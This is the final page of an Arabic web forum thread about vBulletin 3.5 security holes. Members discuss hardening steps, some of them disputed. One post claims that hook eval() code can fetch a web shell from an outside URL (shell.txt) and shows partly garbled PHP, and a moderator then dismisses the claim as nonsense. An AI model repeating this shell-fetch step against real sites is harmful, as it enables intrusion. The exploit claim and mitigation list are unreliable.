صفحة 7 من 7 الأولىالأولى ... 234567
النتائج 91 إلى 102 من 102

الموضوع: أنا لست من مشجعين نسخ vbulletin 3.5 ماذا عنك أنت ؟

  1. #91


    وعليكم السلام

    اهلا بالزميل all-patch

    هذا طرحناه في بداية الموضوع و قمت بمداخلة عن رفضك له مسبقا بدواعي صلاحيات المجلد
    نعم رفضت ذلك ولكن اقتراحي جاء لانقاذ الوضع الحالي بأن يكون المجلد خارج الـ public_html ولكن لن يكون هذا حل يرضي ( جل سوفت ) حتى يعتمد لان هناك خدمات ويب اخرى تختلف عن الـ Apache المنتشر عالمياً.

    الصراحة ما فهمت هذه النقطة جيدا . أو إن صح التعبير ميكانيزم العمل و الصلاحيات .....
    ما كنت أقصده هو الـ suexec ولكن كنت أريد التبسيط للذي لا يعرف الـ suexec

    موفق






  2. #92
    عضو سوبر نشيط
    تاريخ التسجيل
    Nov 2005
    المشاركات
    827


    اقتباس المشاركة الأصلية كتبت بواسطة العندليب
    ما كنت أقصده هو الـ suexec ولكن كنت أريد التبسيط للذي لا يعرف الـ suexec

    في هذه الحالة اعتقد اننا سندخل في مشكل مع اصحاب السيرفرات ، فهناك من يتعامل مع suexec بخصوصية شديدة ...

    على العموم كل ما نطرحه هنا هو اراء و افكار بالتاكيد هي بعيدة عن عيون جلسوفت نفسها ...

    و الاصح فتح هذا الموضوع في منتدى فيبولتين و ليس هنا

    تحياتي لكم جميعا





    __________________
    لا تطمعن في كرم من غرته شهرته ، فقد نسي انه بالأمس نجح بكرم الاخرين
    e107 المعربة www.e107arabic.org
    شبكة الباتشات و السوفتوير www.all-patch.org
    شركة استضافة مغربية www.naja7host.com

  3. #93


    اقتباس المشاركة الأصلية كتبت بواسطة العندليب
    اهلا وسهلا بالسائل الكريم
    راسلني على الايميل
    هنا موضوع نقاش فقط
    اعتذر للتدخلي في النقاش لكن ارسلت لك لاميل ولم اجد اضافتك او اي بريد منك حتىاتمكن من مرسلتك





    __________________
    [CENTER]مجموعه الخليج العربي
    http://www.z2z3.com



    شــات غير تحدي بلا حدود
    http://www.chat-ger.com

    حراج المواقع الجديد للشات غير
    http://chat-ger.com/7rag.html
    للاتصال
    0564202032

  4. #94
    عضو شرف
    تاريخ التسجيل
    Mar 2003
    المشاركات
    1,899


    السلام عليكم

    بصراحه انا معك اخي العندليب

    لي 4 ايام وانا احاول اقفل ثغرات المنتدى وبيرجعوا يخترقوه ولا اعرف من هو الذي يقصدني لانه كل مايخترق بيرفع ملف shell على مجلدي الخاص بالسبرفر وكأنها رساله منه

    ولكن شدني الانتباه انه اخترق السيرفر وليس المنتدى لانه يقوم باعادة ترخيص المجلد

    طبعا بوجود اكثر من 3 ثغرات على نسخة 3.5.4 لن يفلت منها اي كان لذلك قمت بايقاف المنتدى نهائيا عن العمل


    وعلى حد علمي لحد الان ببعض الثغرات فعلى الكل اتباع التالي

    بالنسبه لثغرات الاضافات :
    1: اغلاق سكريبت الاهداءات ( يمكن ترقيعها )
    2: اغلاق الصندوق الماسي ( يمكن ترقيعها )
    3: تعطيل ال hookبشكل نهائي

    بالنسبه لثغرات المنتدى :
    1: تغيير الملف المسمى بـ faq.php الى اي اسم اخر
    2: تغيير اسم ملف الادمن وملف المشرفين
    3: اعطاء تصريح 666 لملف الادمين وتغييره في حالة اردت دخول لوحة التحكم
    4: تعطيل التقويم والعشر المواضيع الاخيره
    5: تعطيل html في كامل المنتدى
    6: تعطيل الرسائل الخاصه
    7: حماية مجلد includes
    8: اغلاق الارشيف ومن ثم حماية مجلد archive
    9: حذف تاج [img] من المواضيع وعدم تمرير المرفقات ذات الصيغ rar jpg txt

    بالنسبه للفقره التاسعه تعتمد على الشل الروسي الجديد الذي يعمل حتى في حالة اعادة تسميته الى .jpg او .rar او .txt ولا ادري اذا كان هناك صيغ اخر

    بصراحه كثرة الاختراقات في الايام هذه وهناك ثلاث اسباب في نظري
    1: ثغرات المنتدى
    2: قوة الـ shell الجديده
    3: ثغرات ال xss الموجوده في كل سكريبت تقريبا


    طبعا بصفه عامه تعطيل المنتدى باكمله وكان هذا خياري

    بالنسبه لي اذا استطعت الرجوع الى النسخه 2.9 فسوف ارجع لها


    واخيرا ان لم تقم vBulletin بعمل اللازم فلن اكمل مشوار الموقع عن طريقها بل سوف اركب منتدى جيد يعمل بخاصية الفلاش وان جلست بالشهور لتحويل الداتا فسوف افعل ذلك او حتى اركب منتدى يقوم بالقراءه والاضافه فقط بدون اي اضافات اخرى فانا اقوم بتعليم هذه الاجيال ولا اريد لهم غير التعلم ولا انظر الى الاضافات التجميليه للمنتدى


    يعني كل هذه الثغرات وكل هذه الاضافات توقف اي لن يصبح هناك شي للزائر اي بعباره اخرى صدقت يالعندليب بانك لست من مشجعي هذه النسخه .


    واخيرا لي بعض النصائح لاخواننا ولو انها خارج الموضوع

    1: حاول ان يكون موقعك في سيرفر لوحده حتى لاتخترق من قبل موقع اخر على نفس السيرفر ومن ثم تأتي وتقول ثغره بالمنتدى وهي ليست ثغره بالمنتدى
    2: عند تركيب اي سكريبت جديد حاول ان تقرأ عن ثغراته قبل ذلك وان وجدت وليس لها حل حاول ترقيعها بنفسك ثم ضع الحل للاخرين
    3: اجتهد وبرمج بنفسك
    4: اشتري نسخ اصليه للاسكريبتات حتى تستفيد من اي تحديث بسرعه
    5: تابع مواقع ال security دائما

    للاسف انا مضطر لايقاف المنتدى حتى اشعار اخر والسبب هو vBulletin وطريقة برمجتها وطبعا اطفالنا اكبادنا الصغار اطفال النت.

    تحياتي
    MohDesign





    __________________
    محلل لنظم المعلومات - ارسل لي رساله خاصه عبر المنتدى | join me on facebook / twitter
    php | flash&flex&air actionscript 2,3 | ajax&javascript | database pro Analyzer

  5. #95


    يااخوان انا الان بعد الاطلاع على هذا الموضوع لا ن ارقي النسخه الى النسخه الجديده وسابقى على

    3.0.10 لعل وعسى ان يبتعدو عنا اطفال النت

    شكرا لكم واتمنى من اصحاب المواقع الخدميه مثل سوالف وترايدنت الخ نشر هذا الموضوع ليصل الى اكبر عدد ممكن من المستخدمين لنسخ المنتدى ليحذرو وتقل مشتريات جون وتراخيصه ويخرج نسخه جديده تعتمد على اساسيات النسخه التي تسبق هذه

    شكرا





    __________________
    http://www.cd-k.com

    اول موقع عربي لبيع ألعاب البي سي عن طريق الانترنت :)

    cd-k.com@hotmail.com

  6. #96
    عضو نشيط جدا
    تاريخ التسجيل
    May 2006
    المشاركات
    451
    __________________
    Egyp6.Com
    Support@Egyp6.Com
    -------------
    web Hosting - Domain Names - Vps - Online Supporting
    لا تغرنك الحيـاه و زينتها .. .. .. .. فكل الذى فوق التراب تــرابُ

  7. #97


    اقتباس المشاركة الأصلية كتبت بواسطة all-patch
    في هذه الحالة اعتقد اننا سندخل في مشكل مع اصحاب السيرفرات ، فهناك من يتعامل مع suexec بخصوصية شديدة ...

    على العموم كل ما نطرحه هنا هو اراء و افكار بالتاكيد هي بعيدة عن عيون جلسوفت نفسها ...

    و الاصح فتح هذا الموضوع في منتدى فيبولتين و ليس هنا

    تحياتي لكم جميعا
    معليش أخي سأختلف معاك
    باختصار شديد ( اللي يبينا يجينا )


    الزميل MohDesign
    شكراً لمرورك ولكن لدي تعليق على ماذكرت في ردك

    1: حاول ان يكون موقعك في سيرفر لوحده حتى لاتخترق من قبل موقع اخر على نفس السيرفر ومن ثم تأتي وتقول ثغره بالمنتدى وهي ليست ثغره بالمنتدى
    نعم كلام سليم ولكن الأغلب لا يمكن أن يدفع رسوم سرفر خاص ولكن يجب توعية المستضيفين الذي يقدمون الخدمه للإستضافه المشتركه.

    2: عند تركيب اي سكريبت جديد حاول ان تقرأ عن ثغراته قبل ذلك وان وجدت وليس لها حل حاول ترقيعها بنفسك ثم ضع الحل للاخرين
    المفروض عرض السكربت في مواقع السيكيوريتي أو لدى المختصين والسؤال هل هو أمن أم لا؟

    3: اجتهد وبرمج بنفسك
    بإختصار شديد ( أعطي الخبز لخبازه )

    4: اشتري نسخ اصليه للاسكريبتات حتى تستفيد من اي تحديث بسرعه
    كلام منطقي ولكن اللي ماعنده يشتري وش يعمل

    5: تابع مواقع ال security دائما
    هذا المفروض اللي يعمله صاحب أي موقع وأي استضافه فأغلب مواقع السيكيوريتي لديها قوائم بريديه ولو سجلت ستأتيك كل يوم رساله منهم وتعرف ما الجديد في عالم الثغرات المكتشفه فأغلب الأطفال عايش على صدقة هذه المواقع.

    بالنسبه لثغرات المنتدى :
    1: تغيير الملف المسمى بـ faq.php الى اي اسم اخر
    2: تغيير اسم ملف الادمن وملف المشرفين
    3: اعطاء تصريح 666 لملف الادمين وتغييره في حالة اردت دخول لوحة التحكم
    4: تعطيل التقويم والعشر المواضيع الاخيره
    5: تعطيل html في كامل المنتدى
    6: تعطيل الرسائل الخاصه
    7: حماية مجلد includes
    8: اغلاق الارشيف ومن ثم حماية مجلد archive
    9: حذف تاج [img] من المواضيع وعدم تمرير المرفقات ذات الصيغ rar jpg txt
    رقم 1 ورقم 3 ورقم 4 ورقم 6 ورقم 8 ورقم 9 ليس لها أي أساس من الصحه أخي الكريم ولا أدري لماذا ذكرتها وعلى أي أساس.

    بالنسبه لي اذا استطعت الرجوع الى النسخه 2.9 فسوف ارجع لها
    من قال لك بأن نسخ 2 أمنه ؟

    واخيرا ان لم تقم vBulletin بعمل اللازم فلن اكمل مشوار الموقع عن طريقها بل سوف اركب منتدى جيد يعمل بخاصية الفلاش وان جلست بالشهور لتحويل الداتا فسوف افعل ذلك او حتى اركب منتدى يقوم بالقراءه والاضافه فقط بدون اي اضافات اخرى فانا اقوم بتعليم هذه الاجيال ولا اريد لهم غير التعلم ولا انظر الى الاضافات التجميليه للمنتدى
    وهل تعتقد أن ( جل سوفت ) خسرانه اذا تركتها
    الشركه لديها أكثر من نص مليون منتدى مصرح
    احسب عاد كم يطلع لهم كل سنه

    الزملاء مشاري و MedoHard شكرا على مروركم


    بالتوفيق






  8. #98
    عضو فعال
    تاريخ التسجيل
    Apr 2006
    المشاركات
    1,362


    الصراحة ما فهمت من الموضوع شىء . ولكن لثقتي بالعندليب قلت أبحث شوي في النسخه
    بمجرد أن انتهيت من قرآة جزء من الموضوع ورأيته
    يتحدث عن كلمتين وهما vBulletinHook
    بالطبع لم اهتم لردود الشباب لأني علمت أنه سوف تكون عبارات شكر فقط
    توجهت إلي منتدي وخذت باكب وبعدين توجهت اشوف الثغرة
    قلت العندليب كان يتحدث عن قوالب فماذا عن الملفات؟؟
    الملفات ايضا في البدايه مثال ملف index.php + image.php + faq.php
    رأيت بداخلها .. هذه الكلمه vBulletinHook طيب الآن أنا في حيرة ...
    آها تذكرت العندليب قال أن الثغرة في الداله eval يا حلاوة رحنا بلاش يلعنها داله
    Example 1. eval() example - simple text merge
    خلينا من كل هذا والإن لنري الملفات الجديدة التي تم أضافتها لنسخة برنامج الفيبلوتين
    وهي inlinemod.php يا خطورة أمه سوف أسرد لكم الثغرة كيف تعمل

    كود PHP:
    /*======================================================================*\r 
    || #################################################################### 
    || # CVS: $RCSfile: inlinemod.php,v $ - $Revision: 1.47.2.9 $/*======================================================================*\r 
    || #################################################################### 
    \*======================================================================*/ 
    كود PHP:
    // empty ****** 
    set******('vbulletin_inlinepost'''TIMENOW 3600'/'); 
    (
    $hook vBulletinHook::fetch_hook('inlinemod_domoveposts')) ? eval($hook) : false
    كود PHP:
    require_once('./global.php'); 
    require_once(
    DIR '/includes/functions_editor.php'); 
    require_once(
    DIR '/includes/functions_threadmanage.php'); 
    require_once(
    DIR '/includes/functions_databuild.php'); 
    require_once(
    DIR '/includes/functions_log_error.php'); 
    لم نفهم شىء .. منك يا حسن ما فائدتها هذه التي اضفتها
    يا أخواني الكرام كل ملف يعتمد بداخله هذه الكلمه vBulletinHook بأمكاننا وضع بعض الإكود ولن أسردها هنا
    لأنه سوف تعتبر ثغرة وراح يخترب بيوت الناس منها ولن يصلح معها جدار ناري لأنها خارج
    نطاق مجلد المنتدي فهل سنضع جدار ناري علي المجلد الرئيسي ؟ أن الثغرة في ملفات ..
    global.php - inlinemod.php - cron.php وباقي الملفات الخارجيه
    سوف اشرح لكم .. قمت بأضافه بعض الإكود التي يسمح لي برنامج الفيبلوتين بأضافتها عبر المتصفح
    وبعدها أضفت هذا الكود http://www.r1s.cc/shell.txt? الإن تم رفع الشل عبرة هذه الثغرة
    انتظر الصورة
    http://www.r1s.cc/shell.jpg
    ومنها تمكنا من أختراق المنتدي + أختراق السيرفير أن كان المخترق محترف شويه
    الترقيه غير معلومة :ٍ للأسف
    الإستثمار : حصريا
    أكتشاف الثغرة : العندليب
    تم التطوير والأستثمار .
    أحترامي للجميع







  9. #99
    مُجَاهِد سابقاً
    تاريخ التسجيل
    Apr 2004
    المشاركات
    12,000


    اقتباس المشاركة الأصلية كتبت بواسطة j0ker
    الصراحة ما فهمت من الموضوع شىء . ولكن لثقتي بالعندليب قلت أبحث شوي في النسخه
    بمجرد أن انتهيت من قرآة جزء من الموضوع ورأيته
    يتحدث عن كلمتين وهما vBulletinHook
    بالطبع لم اهتم لردود الشباب لأني علمت أنه سوف تكون عبارات شكر فقط
    توجهت إلي منتدي وخذت باكب وبعدين توجهت اشوف الثغرة
    قلت العندليب كان يتحدث عن قوالب فماذا عن الملفات؟؟
    الملفات ايضا في البدايه مثال ملف index.php + image.php + faq.php
    رأيت بداخلها .. هذه الكلمه vBulletinHook طيب الآن أنا في حيرة ...
    آها تذكرت العندليب قال أن الثغرة في الداله eval يا حلاوة رحنا بلاش يلعنها داله
    Example 1. eval() example - simple text merge
    خلينا من كل هذا والإن لنري الملفات الجديدة التي تم أضافتها لنسخة برنامج الفيبلوتين
    وهي inlinemod.php يا خطورة أمه سوف أسرد لكم الثغرة كيف تعمل

    كود PHP:
    /*======================================================================*\r 
    || #################################################################### 
    || # CVS: $RCSfile: inlinemod.php,v $ - $Revision: 1.47.2.9 $/*======================================================================*\r 
    || #################################################################### 
    \*======================================================================*/ 
    كود PHP:
    // empty ****** 
    set******('vbulletin_inlinepost'''TIMENOW 3600'/'); 
    (
    $hook vBulletinHook::fetch_hook('inlinemod_domoveposts')) ? eval($hook) : false
    كود PHP:
    require_once('./global.php'); 
    require_once(
    DIR '/includes/functions_editor.php'); 
    require_once(
    DIR '/includes/functions_threadmanage.php'); 
    require_once(
    DIR '/includes/functions_databuild.php'); 
    require_once(
    DIR '/includes/functions_log_error.php'); 
    لم نفهم شىء .. منك يا حسن ما فائدتها هذه التي اضفتها
    يا أخواني الكرام كل ملف يعتمد بداخله هذه الكلمه vBulletinHook بأمكاننا وضع بعض الإكود ولن أسردها هنا
    لأنه سوف تعتبر ثغرة وراح يخترب بيوت الناس منها ولن يصلح معها جدار ناري لأنها خارج
    نطاق مجلد المنتدي فهل سنضع جدار ناري علي المجلد الرئيسي ؟ أن الثغرة في ملفات ..
    global.php - inlinemod.php - cron.php وباقي الملفات الخارجيه
    سوف اشرح لكم .. قمت بأضافه بعض الإكود التي يسمح لي برنامج الفيبلوتين بأضافتها عبر المتصفح
    وبعدها أضفت هذا الكود http://www.r1s.cc/shell.txt? الإن تم رفع الشل عبرة هذه الثغرة
    انتظر الصورة
    http://www.r1s.cc/shell.jpg
    ومنها تمكنا من أختراق المنتدي + أختراق السيرفير أن كان المخترق محترف شويه
    الترقيه غير معلومة :ٍ للأسف
    الإستثمار : حصريا
    أكتشاف الثغرة : العندليب
    تم التطوير والأستثمار .
    أحترامي للجميع
    لا تصدق مثل هذه الخرابيط .. أنظر الى الرابط ..
    http://www.swalif.net/softs/showthread.php?t=159420





    __________________
    استخدم خاصية تنبيه المشرفين للضرورة وعند ملاحظة موضوع يخالف قوانين منتديات سوالف وسيتم مراجعة الموضوع او المشاركة المبلغ عنها على الفور

  10. #100
    عضو فعال
    تاريخ التسجيل
    Apr 2006
    المشاركات
    1,362


    مشكور اخوي بصراحة لما رئيت المشاركة ارتحت
    انا وجدتها في القراصنة ونسيت اكتب منقول






  11. #101
    عضو نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    45


    اخوي

    برايك الشخصي وبحسب تجربتك

    اي النسخ الي تنصح الجميع باستخدامها ؟





    __________________
    ــرضى الــنــاس غــايـ√ـة لا تــدركــ

    x_3

  12. #102


    أتمنى إغلاق الموضوع.





    __________________
    al3ndaleeb[@]uk2.net





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض